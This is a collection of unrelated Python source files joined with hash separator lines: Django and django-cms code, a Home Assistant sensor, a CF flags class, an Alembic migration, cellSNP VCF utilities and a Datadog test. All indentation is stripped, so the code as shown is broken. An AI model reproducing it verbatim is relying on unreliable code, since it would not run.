self.effective_default(create_field)
)
# Add in any altered fields
if alter_field:
old_field, new_field = alter_field
body.pop(old_field.name, None)
mapping.pop(old_field.column, None)
body[new_field.name] = new_field
if old_field.null and not new_field.null:
case_sql = "coalesce(%(col)s, %(default)s)" % {
'col': self.quote_name(old_field.column),
'default': self.quote_value(self.effective_default(new_field))
}
mapping[new_field.column] = case_sql
else:
mapping[new_field.column] = self.quote_name(old_field.column)
rename_mapping[old_field.name] = new_field.name
# Remove any deleted fields
if delete_field:
del body[delete_field.name]
del mapping[delete_field.column]
# Remove any implicit M2M tables
if delete_field.many_to_many and delete_field.remote_field.through._meta.auto_created:
return self.delete_model(delete_field.remote_field.through)
# Work inside a new app registry
apps = Apps()
# Work out the new value of unique_together, taking renames into
# account
unique_together = [
[rename_mapping.get(n, n) for n in unique]
for unique in model._meta.unique_together
]
# Work out the new value for index_together, taking renames into
# account
index_together = [
[rename_mapping.get(n, n) for n in index]
for index in model._meta.index_together
]
indexes = model._meta.indexes
if delete_field:
indexes = [
index for index in indexes
if delete_field.name not in index.fields
]
constraints = list(model._meta.constraints)
# Provide isolated instances of the fields to the new model body so
# that the existing model's internals aren't interfered with when
# the dummy model is constructed.
body_copy = copy.deepcopy(body)
# Construct a new model with the new fields to allow self referential
# primary key to resolve to. This model won't ever be materialized as a
# table and solely exists for foreign key reference resolution purposes.
# This wouldn't be required if the schema editor was operating on model
# states instead of rendered models.
meta_contents = {
'app_label': model._meta.app_label,
'db_table': model._meta.db_table,
'unique_together': unique_together,
'index_together': index_together,
'indexes': indexes,
'constraints': constraints,
'apps': apps,
}
meta = type("Meta", (), meta_contents)
body_copy['Meta'] = meta
body_copy['__module__'] = model.__module__
type(model._meta.object_name, model.__bases__, body_copy)
# Construct a model with a renamed table name.
body_copy = copy.deepcopy(body)
meta_contents = {
'app_label': model._meta.app_label,
'db_table': 'new__%s' % model._meta.db_table,
'unique_together': unique_together,
'index_together': index_together,
'indexes': indexes,
'constraints': constraints,
'apps': apps,
}
meta = type("Meta", (), meta_contents)
body_copy['Meta'] = meta
body_copy['__module__'] = model.__module__
new_model = type('New%s' % model._meta.object_name, model.__bases__, body_copy)
# Create a new table with the updated schema.
self.create_model(new_model)
# Copy data from the old table into the new table
self.execute("INSERT INTO %s (%s) SELECT %s FROM %s" % (
self.quote_name(new_model._meta.db_table),
', '.join(self.quote_name(x) for x in mapping),
', '.join(mapping.values()),
self.quote_name(model._meta.db_table),
))
# Delete the old table to make way for the new
self.delete_model(model, handle_autom2m=False)
# Rename the new table to take way for the old
self.alter_db_table(
new_model, new_model._meta.db_table, model._meta.db_table,
disable_constraints=False,
)
# Run deferred SQL on correct table
for sql in self.deferred_sql:
self.execute(sql)
self.deferred_sql = []
# Fix any PK-removed field
if restore_pk_field:
restore_pk_field.primary_key = True
def delete_model(self, model, handle_autom2m=True):
if handle_autom2m:
super().delete_model(model)
else:
# Delete the table (and only that)
self.execute(self.sql_delete_table % {
"table": self.quote_name(model._meta.db_table),
})
# Remove all deferred statements referencing the deleted table.
for sql in list(self.deferred_sql):
if isinstance(sql, Statement) and sql.references_table(model._meta.db_table):
self.deferred_sql.remove(sql)
def add_field(self, model, field):
"""
Create a field on a model. Usually involves adding a column, but may
involve adding a table instead (for M2M fields).
"""
# Special-case implicit M2M tables
if field.many_to_many and field.remote_field.through._meta.auto_created:
return self.create_model(field.remote_field.through)
self._remake_table(model, create_field=field)
def remove_field(self, model, field):
"""
Remove a field from a model. Usually involves deleting a column,
but for M2Ms may involve deleting a table.
"""
# M2M fields are a special case
if field.many_to_many:
# For implicit M2M tables, delete the auto-created table
if field.remote_field.through._meta.auto_created:
self.delete_model(field.remote_field.through)
# For explicit "through" M2M fields, do nothing
# For everything else, remake.
else:
# It might not actually have a column behind it
if field.db_parameters(connection=self.connection)['type'] is None:
return
self._remake_table(model, delete_field=field)
def _alter_field(self, model, old_field, new_field, old_type, new_type,
old_db_params, new_db_params, strict=False):
"""Perform a "physical" (non-ManyToMany) field update."""
# Use "ALTER TABLE ... RENAME COLUMN" if only the column name
# changed and there aren't any constraints.
if (self.connection.features.can_alter_table_rename_column and
old_field.column != new_field.column and
self.column_sql(model, old_field) == self.column_sql(model, new_field) and
not (old_field.remote_field and old_field.db_constraint or
new_field.remote_field and new_field.db_constraint)):
return self.execute(self._rename_field_sql(model._meta.db_table, old_field, new_field, new_type))
# Alter by remaking table
self._remake_table(model, alter_field=(old_field, new_field))
# Rebuild tables with FKs pointing to this field if the PK type changed.
if old_field.primary_key and new_field.primary_key and old_type != new_type:
for rel in new_field.model._meta.related_objects:
if not rel.many_to_many:
self._remake_table(rel.related_model)
def _alter_many_to_many(self, model, old_field, new_field, strict):
"""Alter M2Ms to repoint their to= endpoints."""
if old_field.remote_field.through._meta.db_table == new_field.remote_field.through._meta.db_table:
# The field name didn't change, but some options did; we have to propagate this altering.
self._remake_table(
old_field.remote_field.through,
alter_field=(
# We need the field that points to the target model, so we can tell alter_field to change it -
# this is m2m_reverse_field_name() (as opposed to m2m_field_name, which points to our model)
old_field.remote_field.through._meta.get_field(old_field.m2m_reverse_field_name()),
new_field.remote_field.through._meta.get_field(new_field.m2m_reverse_field_name()),
),
)
return
# Make a new through table
self.create_model(new_field.remote_field.through)
# Copy the data across
self.execute("INSERT INTO %s (%s) SELECT %s FROM %s" % (
self.quote_name(new_field.remote_field.through._meta.db_table),
', '.join([
"id",
new_field.m2m_column_name(),
new_field.m2m_reverse_name(),
]),
', '.join([
"id",
old_field.m2m_column_name(),
old_field.m2m_reverse_name(),
]),
self.quote_name(old_field.remote_field.through._meta.db_table),
))
# Delete the old through table
self.delete_model(old_field.remote_field.through)
def add_constraint(self, model, constraint):
self._remake_table(model)
def remove_constraint(self, model, constraint):
self._remake_table(model)
|
py | 1a4b95a308d18176c13aa923577bf3b00461dccd | import datetime
import voluptuous as vol
from homeassistant.core import callback
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import CONF_NAME, CONF_ICON, CONF_WEEKDAY, ATTR_DATE
import homeassistant.util.dt as dt_util
from homeassistant.helpers.event import async_track_point_in_utc_time
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
CONF_EPOCH = 'epoch'
CONF_FREQUENCY = 'frequency'
DATE_STR_FORMAT = '%A, %Y-%m-%d'
WEEKDAY_STR_FORMAT = '%A'
DEFAULT_NAME = 'Upcoming Event'
DEFAULT_ICON = 'mdi:calendar-clock'
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_EPOCH): cv.date,
vol.Optional(CONF_ICON): cv.icon,
vol.Required(CONF_FREQUENCY): vol.Coerce(int),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
})
async def async_setup_platform(hass, config, async_add_entities,
discovery_info=None):
"""Setup the sensor platform."""
sensor_name = config.get(CONF_NAME)
icon = config.get(CONF_ICON)
epoch = config.get(CONF_EPOCH)
frequency = config.get(CONF_FREQUENCY)
sensors = [
PeriodicEventSensor(hass, f'{sensor_name} Date', icon, epoch,
frequency),
PeriodicEventRelativeSensor(hass, sensor_name, icon, epoch, frequency),
]
for sensor in sensors:
async_track_point_in_utc_time(
hass, sensor.point_in_time_listener, sensor.get_next_interval())
async_add_entities(sensors, True)
class PeriodicEventSensor(Entity):
def __init__(self, hass, name, icon, epoch, frequency):
"""Initialize the sensor."""
self.hass = hass
self._name = name
self._icon = icon
self._epoch = epoch
self._frequency = frequency
self._state = None
self._next_event = None
self._update_internal_state(dt_util.utcnow())
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def state(self):
"""Return the state of the sensor."""
return self._state
@property
def icon(self):
"""Return the icon of the sensor."""
return self._icon
@property
def device_state_attributes(self):
return {
ATTR_DATE: self._next_event.isoformat(),
CONF_WEEKDAY: self._next_event.strftime(WEEKDAY_STR_FORMAT)
}
def _get_next_event(self, now):
""" Compute the next event """
from dateutil import relativedelta
today = dt_util.as_local(now).date()
weekday = relativedelta.weekdays[self._epoch.weekday()]
next_event = today + relativedelta.relativedelta(weekday=weekday)
# Check if this date matches the frequency after epoch, or else
# calculate the correct date
remainder = (next_event - self._epoch).days / 7 % self._frequency
if remainder != 0:
next_event = next_event + \
datetime.timedelta(weeks=self._frequency - remainder)
return next_event
def get_next_interval(self, now=None):
"""Compute next time update should occur (at next event)."""
if not now:
now = dt_util.utcnow()
next_event = self._get_next_event(now)
return datetime.datetime(
next_event.year, next_event.month, next_event.day)
def _update_internal_state(self, now):
self._next_event = self._get_next_event(now)
self._state = self._next_event.strftime(DATE_STR_FORMAT)
@callback
def point_in_time_listener(self, now):
"""Update state and schedule same listener to run again."""
self._update_internal_state(now)
self.async_schedule_update_ha_state()
async_track_point_in_utc_time(
self.hass, self.point_in_time_listener, self.get_next_interval())
class PeriodicEventRelativeSensor(PeriodicEventSensor):
def get_next_interval(self, now=None):
"""Compute next time update should occur (eg updates daily)."""
if now is None:
now = dt_util.utcnow()
start_of_day = dt_util.start_of_local_day(dt_util.as_local(now))
return start_of_day + datetime.timedelta(days=1)
def _update_internal_state(self, now):
from natural.date import duration
super()._update_internal_state(now)
# Compute the human-readable text between today and the next event
today = dt_util.as_local(now).date()
difference = self._next_event - today
if (difference.days == 0):
self._state = 'Today'
elif (difference.days == 1):
self._state = 'Tomorrow'
else:
self._state = duration(self._next_event, now=today, precision=2)
|
py | 1a4b96eef10334d169c29886865db8c581f8e527 | bicycles = ['trek','cannondale','redline','specialized'];
print(bicycles);
print(bicycles[0]);
bicycles[0] = "dacati";
print(bicycles);
bicycles.append("ducati");
print(bicycles);
bicycles.insert(0,"ducati");
print(bicycles);
del bicycles[0];
print(bicycles);
bicycles.pop();
print(bicycles);
bicycles.pop(0);
print(bicycles);
bicycles.remove('redline');
print(bicycles);
# 排序
cars = ['bmw','audi',"toyota",'subaru'];
cars.sort();
print(cars);
cars.sort(reverse=True);
print(cars);
cars = ['bmw','audi',"toyota",'subaru'];
print("Here is the original list:");
print(cars);
print("\nHere is the sorted list:");
print(sorted(cars));
print("\nHere is the original list:");
print(cars);
cars.reverse();
print(cars);
print(len(cars)); |
py | 1a4b99284b2dc9470a84ca7eaa2921210048741d | from numpy import argsort as numpy_argsort
from numpy import atleast_1d as numpy_atleast_1d
from numpy import ndarray as numpy_ndarray
from copy import deepcopy
from .functions import RTOL, ATOL, equals
from .functions import inspect as cf_inspect
class Flags:
'''Self-describing CF flag values.
Stores the flag_values, flag_meanings and flag_masks CF attributes in
an internally consistent manner.
'''
def __init__(self, **kwargs):
'''**Initialization**
:Parameters:
flag_values : optional
The flag_values CF property. Sets the `flag_values`
attribute.
flag_meanings : optional
The flag_meanings CF property. Sets the `flag_meanings`
attribute.
flag_masks : optional
The flag_masks CF property. Sets the `flag_masks`
attribute.
'''
for attr, value in kwargs.items():
if value is not None:
setattr(self, attr, value)
def __eq__(self, other):
'''x.__eq__(y) <==> x==y <==> x.equals(y)
'''
return self.equals(other)
def __ne__(self, other):
'''x.__ne__(y) <==> x!=y <==> not x.equals(y)
'''
return not self.equals(other)
def __hash__(self):
'''Return the hash value of the flags.
Note that the flags will be sorted in place.
:Returns:
`int`
The hash value.
**Examples:**
>>> hash(f)
-956218661958673979
'''
self.sort()
x = [tuple(getattr(self, attr, ()))
for attr in ('_flag_meanings', '_flag_values', '_flag_masks')]
return hash(tuple(x))
def __bool__(self):
'''x.__bool__() <==> x!=0
'''
for attr in ('_flag_meanings', '_flag_values', '_flag_masks'):
if hasattr(self, attr):
return True
#--- End: for
return False
# ----------------------------------------------------------------
# Attributes
# ----------------------------------------------------------------
@property
def flag_values(self):
'''The flag_values CF attribute.
Stored as a 1-d numpy array but may be set as any array-like
object.
**Examples:*
>>> f.flag_values = ['a', 'b', 'c']
>>> f.flag_values
array(['a', 'b', 'c'], dtype='|S1')
>>> f.flag_values = numpy.arange(4, dtype='int8')
>>> f.flag_values
array([1, 2, 3, 4], dtype=int8)
>>> f.flag_values = 1
>>> f.flag_values
array([1])
'''
try:
return self._flag_values
except AttributeError:
raise AttributeError("'%s' has no attribute 'flag_values'" %
self.__class__.__name__)
@flag_values.setter
def flag_values(self, value):
if not isinstance(value, numpy_ndarray):
value = numpy_atleast_1d(value)
self._flag_values = value
@flag_values.deleter
def flag_values(self):
try:
del self._flag_values
except AttributeError:
raise AttributeError("Can't delete '%s' attribute 'flag_values'" %
self.__class__.__name__)
# ----------------------------------------------------------------
# Property attribute: flag_masks
# ----------------------------------------------------------------
@property
def flag_masks(self):
'''The flag_masks CF attribute.
Stored as a 1-d numpy array but may be set as array-like object.
**Examples:*
>>> f.flag_masks = numpy.array([1, 2, 4], dtype='int8')
>>> f.flag_masks
array([1, 2, 4], dtype=int8)
>>> f.flag_masks = 1
>>> f.flag_masks
array([1])
'''
try:
return self._flag_masks
except AttributeError:
raise AttributeError("'%s' object has no attribute 'flag_masks'" %
self.__class__.__name__)
@flag_masks.setter
def flag_masks(self, value):
if not isinstance(value, numpy_ndarray):
value = numpy_atleast_1d(value)
self._flag_masks = value
@flag_masks.deleter
def flag_masks(self):
try:
del self._flag_masks
except AttributeError:
raise AttributeError("Can't delete '%s' attribute 'flag_masks'" %
self.__class__.__name__)
@property
def flag_meanings(self):
'''The flag_meanings CF attribute.
Stored as a 1-d numpy string array but may be set as a space
delimited string or any array-like object.
**Examples:*
>>> f.flag_meanings = 'low medium high'
>>> f.flag_meanings
array(['low', 'medium', 'high'],
dtype='|S6')
>>> f.flag_meanings = ['left', 'right']
>>> f.flag_meanings
array(['left', 'right'],
dtype='|S5')
>>> f.flag_meanings = 'ok'
>>> f.flag_meanings
array(['ok'],
dtype='|S2')
>>> f.flag_meanings = numpy.array(['a', 'b'])
>>> f.flag_meanings
array(['a', 'b'],
dtype='|S1')
'''
try:
return self._flag_meanings
except AttributeError:
raise AttributeError("'%s' object has no attribute 'flag_meanings'" %
self.__class__.__name__)
@flag_meanings.setter
def flag_meanings(self, value):
if isinstance(value, str):
value = numpy_atleast_1d(value.split())
elif not isinstance(value, numpy_ndarray):
value = numpy_atleast_1d(value)
self._flag_meanings = value
@flag_meanings.deleter
def flag_meanings(self):
try:
del self._flag_meanings
except AttributeError:
raise AttributeError("Can't delete '%s' attribute 'flag_meanings'" %
self.__class__.__name__)
def __repr__(self):
'''x.__repr__() <==> repr(x)
'''
string = []
if hasattr(self, 'flag_values'):
string.append('flag_values=%s' % str(self.flag_values))
if hasattr(self, 'flag_masks'):
string.append('flag_masks=%s' % str(self.flag_masks))
if hasattr(self, 'flag_meanings'):
string.append('flag_meanings=%s' % str(self.flag_meanings))
return '<CF %s: %s>' % (self.__class__.__name__,
', '.join(string))
def copy(self):
'''Return a deep copy.
Equivalent to ``copy.deepcopy(f)``
:Returns:
The deep copy.
**Examples:*
>>> f.copy()
'''
return deepcopy(self)
def dump(self, display=True, _level=0):
'''Return a string containing a full description of the instance.
:Parameters:
display : bool, optional
If False then return the description as a string. By
default the description is printed, i.e. ``f.dump()`` is
equivalent to ``print(f.dump(display=False))``.
:Returns:
`None` or `str`
A string containing the description.
'''
indent0 = ' ' * _level
indent1 = ' ' * (_level+1)
string = ['%sFlags:' % indent0]
for attr in ('_flag_values', '_flag_meanings', '_flag_masks'):
value = getattr(self, attr, None)
if value is not None:
string.append('%s%s = %s' % (indent1, attr[1:], list(value)))
#--- End: for
string = '\n'.join(string)
if display:
print(string)
else:
return(string)
def equals(self, other, rtol=None, atol=None,
ignore_fill_value=False, verbose=False,
traceback=False):
'''True if two groups of flags are logically equal, False otherwise.
Note that both instances are sorted in place prior to the comparison.
:Parameters:
other:
The object to compare for equality.
atol: float, optional
The absolute tolerance for all numerical comparisons, By
default the value returned by the `ATOL` function is used.
rtol: float, optional
The relative tolerance for all numerical comparisons, By
default the value returned by the `RTOL` function is used.
ignore_fill_value: bool, optional
If True then data arrays with different fill values are
considered equal. By default they are considered unequal.
traceback: deprecated at version 3.0.0.
Use *verbose* instead.
:Returns:
`bool`
Whether or not the two instances are equal.
**Examples:*
>>> f
<CF Flags: flag_values=[1 0 2], flag_masks=[2 0 2], flag_meanings=['medium' 'low' 'high']>
>>> g
<CF Flags: flag_values=[2 0 1], flag_masks=[2 0 2], flag_meanings=['high' 'low' 'medium']>
>>> f.equals(g)
True
>>> f
<CF Flags: flag_values=[0 1 2], flag_masks=[0 2 2], flag_meanings=['low' 'medium' 'high']>
>>> g
<CF Flags: flag_values=[0 1 2], flag_masks=[0 2 2], flag_meanings=['low' 'medium' 'high']>
'''
if traceback:
_DEPRECATION_ERROR_KWARGS(self, 'equals', traceback=True) # pragma: no cover
# Check that each instance is the same type
if self.__class__ != other.__class__:
if verbose:
print("%s: Different type: %s, %s" %
(self.__class__.__name__,
self.__class__.__name__, other.__class__.__name__)) # pragma: no cover
return False
self.sort()
other.sort()
# Set default tolerances
if rtol is None:
rtol = RTOL()
if atol is None:
atol = ATOL()
for attr in ('_flag_meanings', '_flag_values', '_flag_masks'):
if hasattr(self, attr):
if not hasattr(other, attr):
if verbose:
print("%s: Different attributes: %s" %
(self.__class__.__name__, attr[1:])) # pragma: no cover
return False
x = getattr(self, attr)
y = getattr(other, attr)
if (x.shape != y.shape or
not equals(x, y, rtol=rtol, atol=atol,
ignore_fill_value=ignore_fill_value,
verbose=verbose)):
if verbose:
print("%s: Different '%s': %r, %r" %
(self.__class__.__name__, attr[1:], x, y)) # pragma: no cover
return False
elif hasattr(other, attr):
if verbose:
print("%s: Different attributes: %s" %
(self.__class__.__name__, attr[1:])) # pragma: no cover
return False
#--- End: for
return True
def inspect(self):
'''Inspect the object for debugging.
.. seealso:: `cf.inspect`
:Returns:
`None`
'''
print(cf_inspect(self)) # pragma: no cover
def sort(self):
'''Sort the flags in place.
By default sort by flag values. If flag values are not present
then sort by flag meanings. If flag meanings are not present then
sort by flag_masks.
:Returns:
`None`
**Examples:*
>>> f
<CF Flags: flag_values=[2 0 1], flag_masks=[2 0 2], flag_meanings=['high' 'low' 'medium']>
>>> f.sort()
>>> f
<CF Flags: flag_values=[0 1 2], flag_masks=[0 2 2], flag_meanings=['low' 'medium' 'high']>
'''
if not self:
return
# Sort all three attributes
for attr in ('flag_values', '_flag_meanings', '_flag_masks'):
if hasattr(self, attr):
indices = numpy_argsort(getattr(self, attr))
break
#--- End: for
for attr in ('_flag_values', '_flag_meanings', '_flag_masks'):
if hasattr(self, attr):
array = getattr(self, attr).view()
array[...] = array[indices]
#--- End: for
#--- End: class
|
py | 1a4b9935dee4ba242d4ded884bf4461cd701d973 | """Added transactions table
Revision ID: 5632aa202d89
Revises: 3a47813ce501
Create Date: 2015-03-18 14:54:09.061787
"""
# revision identifiers, used by Alembic.
revision = '5632aa202d89'
down_revision = '4d3ed7925db3'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.create_table('quark_transactions',
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('id', sa.Integer(), nullable=False),
sa.PrimaryKeyConstraint('id'),
mysql_engine='InnoDB')
op.add_column(u'quark_ip_addresses',
sa.Column('transaction_id', sa.Integer(), nullable=True))
op.create_foreign_key('fk_quark_ips_transaction_id',
'quark_ip_addresses',
'quark_transactions',
['transaction_id'],
['id'])
def downgrade():
op.drop_constraint('fk_quark_ips_transaction_id', 'quark_ip_addresses',
type_='foreignkey')
op.drop_column(u'quark_ip_addresses', 'transaction_id')
op.drop_table('quark_transactions')
|
py | 1a4b993b104416cc731a1ab6435cf7397d62c69b | from django.http import HttpResponse
from django.shortcuts import render_to_response
from django.template.base import Template
from django.template.context import RequestContext
from cms.test_utils.project.placeholderapp.models import (Example1,
MultilingualExample1)
from cms.utils import get_language_from_request
def example_view(request):
context = RequestContext(request)
context['examples'] = Example1.objects.all()
return render_to_response('placeholderapp.html', context)
def _base_detail(request, instance, template_name='detail.html',
item_name="char_1", template_string='',):
context = RequestContext(request)
context['instance'] = instance
context['item_name'] = item_name
if template_string:
template = Template(template_string)
return HttpResponse(template.render(context))
else:
return render_to_response(template_name, context)
def list_view_multi(request):
context = RequestContext(request)
context['examples'] = MultilingualExample1.objects.language(
get_language_from_request(request)).all()
return render_to_response('list.html', context)
def detail_view_multi(request, pk, template_name='detail_multi.html',
item_name="char_1", template_string='',):
instance = MultilingualExample1.objects.language(
get_language_from_request(request)).get(pk=pk)
return _base_detail(request, instance, template_name, item_name,
template_string)
def list_view(request):
context = RequestContext(request)
context['examples'] = Example1.objects.all()
return render_to_response('list.html', context)
def detail_view(request, pk, template_name='detail.html', item_name="char_1",
template_string='',):
instance = Example1.objects.get(pk=pk)
return _base_detail(request, instance, template_name, item_name,
template_string)
|
py | 1a4b99917cfcb2b399eee4b7b2e0bb47dfb3a4a1 | # Copied from cellSNP, https://raw.githubusercontent.com/single-cell-genetics/cellSNP/purePython/cellSNP/utils/vcf_utils.py
# Utilility functions for processing vcf files
# Author: Yuanhua Huang
# Date: 09/06/2019
import os
import sys
import gzip
import subprocess
import numpy as np
def parse_sample_info(sample_dat, sparse=True):
"""
Parse genotype information for each sample
Note, it requires the format for each variants to
be the same.
"""
if sample_dat == [] or sample_dat is None:
return None
# require the same format for all variants
format_all = [x[0] for x in sample_dat]
if format_all.count(format_all[0]) != len(format_all):
print("Error: require the same format for all variants.")
exit()
format_list = format_all[0].split(":")
RV = {}
for _format in format_list:
RV[_format] = []
if sparse:
RV['indices'] = []
RV['indptr'] = [0]
RV['shape'] = (len(sample_dat[0][1:]), len(sample_dat))
missing_val = ":".join(["."] * len(format_list))
cnt = 0
for j in range(len(sample_dat)): #variant j
_line = sample_dat[j]
for i in range(len(_line[1:])): #cell i
if _line[i+1] == missing_val:
continue
_line_key = _line[i+1].split(":")
for k in range(len(format_list)):
RV[format_list[k]].append(_line_key[k])
cnt += 1
RV['indices'].append(i)
RV['indptr'].append(cnt)
else:
for _line in sample_dat:
_line_split = [x.split(":") for x in _line[1:]]
for k in range(len(format_list)):
_line_key = [x[k] for x in _line_split]
RV[format_list[k]].append(_line_key)
return RV
def load_VCF(vcf_file, biallelic_only=False, load_sample=True, sparse=True):
"""
Load whole VCF file
-------------------
Initially designed to load VCF from cellSNP output, requiring
1) all variants have the same format list;
2) a line starting with "#CHROM", with sample ids.
If these two requirements are satisfied, this function also supports general
VCF files, e.g., genotype for multiple samples.
Note, it may take a large memory, please filter the VCF with bcftools first.
"""
if vcf_file[-3:] == ".gz" or vcf_file[-4:] == ".bgz":
infile = gzip.open(vcf_file, "rb")
is_gzip = True
else:
infile = open(vcf_file, "r")
is_gzip = False
FixedINFO = {}
contig_lines = []
comment_lines = []
var_ids, obs_ids, obs_dat = [], [], []
for line in infile:
if is_gzip:
line = line.decode('utf-8')
if line.startswith("#"):
if line.startswith("##contig="):
contig_lines.append(line.rstrip())
if line.startswith("#CHROM"):
obs_ids = line.rstrip().split("\t")[9:]
key_ids = line[1:].rstrip().split("\t")[:8]
for _key in key_ids:
FixedINFO[_key] = []
else:
comment_lines.append(line.rstrip())
else:
list_val = line.rstrip().split("\t") #[:5] #:8
if biallelic_only:
if len(list_val[3]) > 1 or len(list_val[4]) > 1:
continue
if load_sample:
obs_dat.append(list_val[8:])
for i in range(len(key_ids)):
FixedINFO[key_ids[i]].append(list_val[i])
var_ids.append("_".join([list_val[x] for x in [0, 1, 3, 4]]))
infile.close()
RV = {}
RV["variants"] = var_ids
RV["FixedINFO"] = FixedINFO
RV["samples"] = obs_ids
RV["GenoINFO"] = parse_sample_info(obs_dat, sparse=sparse)
RV["contigs"] = contig_lines
RV["comments"] = comment_lines
return RV
def write_VCF_to_hdf5(VCF_dat, out_file):
"""
Write vcf data into hdf5 file
"""
import h5py
f = h5py.File(out_file, 'w')
f.create_dataset("contigs", data=np.string_(VCF_dat['contigs']),
compression="gzip", compression_opts=9)
f.create_dataset("samples", data=np.string_(VCF_dat['samples']),
compression="gzip", compression_opts=9)
f.create_dataset("variants", data=np.string_(VCF_dat['variants']),
compression="gzip", compression_opts=9)
f.create_dataset("comments", data=np.string_(VCF_dat['comments']),
compression="gzip", compression_opts=9)
## variant fixed information
fixed = f.create_group("FixedINFO")
for _key in VCF_dat['FixedINFO']:
fixed.create_dataset(_key, data=np.string_(VCF_dat['FixedINFO'][_key]),
compression="gzip", compression_opts=9)
## genotype information for each sample
geno = f.create_group("GenoINFO")
for _key in VCF_dat['GenoINFO']:
geno.create_dataset(_key, data=np.string_(VCF_dat['GenoINFO'][_key]),
compression="gzip", compression_opts=9)
f.close()
def read_sparse_GeneINFO(GenoINFO, keys=['AD', 'DP']):
M, N = np.array(GenoINFO['shape']).astype('int')
indptr = np.array(GenoINFO['indptr']).astype('int')
indices = np.array(GenoINFO['indices']).astype('int')
from scipy.sparse import csr_matrix
RV = {}
for _key in keys:
data = np.array(GenoINFO[_key]).astype('float')
RV[_key] = csr_matrix((data, indices, indptr), shape=(N, M))
return RV
def merge_vcf(out_file, out_files, hdf5_out=True):
"""Merge vcf for all chromsomes
"""
if out_file.endswith(".gz"):
out_file_use = out_file.split(".gz")[0]
else:
out_file_use = out_file
CNT = 0
fid_out = open(out_file_use, "w")
for _file in out_files:
with open(_file, "r") as fid_in:
for line in fid_in:
if line.startswith("#") and _file != out_files[0]:
continue
else:
CNT += 1
fid_out.writelines(line)
os.remove(_file)
fid_out.close()
print("[cellSNP] %d lines in final vcf file" %CNT)
import shutil
if shutil.which("bgzip") is not None:
bashCommand = "bgzip -f %s" %(out_file_use)
else:
bashCommand = "gzip -f %s" %(out_file_use)
pro = subprocess.Popen(bashCommand.split(), stdout=subprocess.PIPE)
pro.communicate()[0]
## save to hdf5 file
if hdf5_out:
vcf_dat = load_VCF(out_file_use + ".gz", load_sample=True, sparse=True)
write_VCF_to_hdf5(vcf_dat, out_file_use + ".h5")
return None
def VCF_to_sparseMat(vcf_file, tags=["AD", "DP"], out_dir=None):
"""
Write VCF sample info into sparse matrices with given tags
"""
# out samples, out_var, tag_files
var_info = []
tag_mat_list = []
for _tag in tags:
_dict = {"data": [], "row": [], "col": []}
tag_mat_list.append(_dict)
if vcf_file[-3:] == ".gz" or vcf_file[-4:] == ".bgz":
infile = gzip.open(vcf_file, "rb")
is_gzip = True
else:
infile = open(vcf_file, "r")
is_gzip = False
var_idx, obs_idx = 0, 0
for line in infile:
if is_gzip:
line = line.decode('utf-8')
if line.startswith("#"):
if line.startswith("#CHROM"):
samples = line.rstrip().split("\t")[9:]
continue
## variants line
var_idx += 1
list_val = line.rstrip().split("\t")
var_info.append(list_val[:8])
FORMAT = list_val[8].split(":")
tag_idx = []
for _tag in tags:
if _tag in FORMAT:
tag_idx.append(FORMAT.index(_tag))
else:
tag_idx.append(None)
for obs_idx in range(len(list_val[9:])):
_samp_dat = list_val[9 + obs_idx]
if _samp_dat == ".":
continue
_samp_val = _samp_dat.split(":")
for ii in range(len(tags)):
if tag_idx[ii] is None:
continue
tag_dat = _samp_val[tag_idx[ii]]
if (tag_dat != "." and tag_dat != "0" and
tag_dat.count(".,") == 0):
tag_mat_list[ii]["data"].append(tag_dat)
tag_mat_list[ii]["row"].append(var_idx)
tag_mat_list[ii]["col"].append(obs_idx + 1)
infile.close()
if out_dir is not None:
if not os.path.exists(out_dir):
os.mkdir(out_dir)
fid_obs = open(out_dir + "/cellSNP.samples.tsv", "w")
fid_obs.writelines("\n".join(samples) + "\n")
fid_obs.close()
fid_var = open(out_dir + "/cellSNP.base.vcf", "w")
fid_var.writelines("##fileformat=VCFv4.2\n")
fid_var.writelines("#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\n")
for _var_info in var_info:
fid_var.writelines("\t".join(_var_info) + "\n")
fid_var.close()
try:
import shutil
if shutil.which("bgzip") is not None:
bashCommand = "bgzip -f %s" %(out_dir + "/cellSNP.base.vcf")
else:
bashCommand = "gzip -f %s" %(out_dir + "/cellSNP.base.vcf")
pro = subprocess.Popen(bashCommand.split(), stdout=subprocess.PIPE)
pro.communicate()[0]
except:
print("sparse matrix: VCF uncmpressed.")
for ii in range(len(tags)):
_mat = tag_mat_list[ii]
_dat = _mat["data"]
_row = _mat["row"]
_col = _mat["col"]
fid = open(out_dir + "/cellSNP.tag.%s.mtx" %(tags[ii]), "w")
fid.writelines("%" +
"%MatrixMarket matrix coordinate integer general\n")
fid.writelines("%\n")
fid.writelines("%d\t%d\t%d\n" %(len(var_info), len(samples),
len(_dat)))
for jj in range(len(_dat)):
fid.writelines("%d\t%d\t%s\n" %(_row[jj], _col[jj], _dat[jj]))
fid.close()
return var_info, samples, tag_mat_list
|
py | 1a4b99a7818ba7e6c100010ed1166f0167e82822 | # (C) Datadog, Inc. 2021-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import pytest
from datadog_checks.dev.tooling.configuration.consumers.model.model_consumer import VALIDATORS_DOCUMENTATION
from ...utils import get_model_consumer, normalize_yaml
pytestmark = [pytest.mark.conf, pytest.mark.conf_consumer, pytest.mark.conf_consumer_model]
def test():
consumer = get_model_consumer(
"""
name: test
version: 0.0.0
files:
- name: test.yaml
options:
- template: instances
options:
- name: foo
required: true
description: words
value:
type: string
- name: example
description: words
value:
example: bar
type: string
- name: default_precedence
description: words
value:
example: bar
default: baz
type: string
- name: example_ignored_array
description: words
value:
example:
- test
type: array
items:
type: string
- name: example_ignored_object
description: words
value:
example:
key: value
type: object
additionalProperties: true
- name: long_default_formatted
description: words
value:
default:
- ["01", "02", "03", "04", "05"]
- ["06", "07", "08", "09", "10"]
- ["11", "12", "13", "14", "15"]
- ["16", "17", "18", "19", "20"]
- ["21", "22", "23", "24", "25"]
type: array
items:
type: array
items:
type: string
"""
)
model_definitions = consumer.render()
assert len(model_definitions) == 1
files = model_definitions['test.yaml']
assert len(files) == 4
validators_contents, validators_errors = files['validators.py']
assert not validators_errors
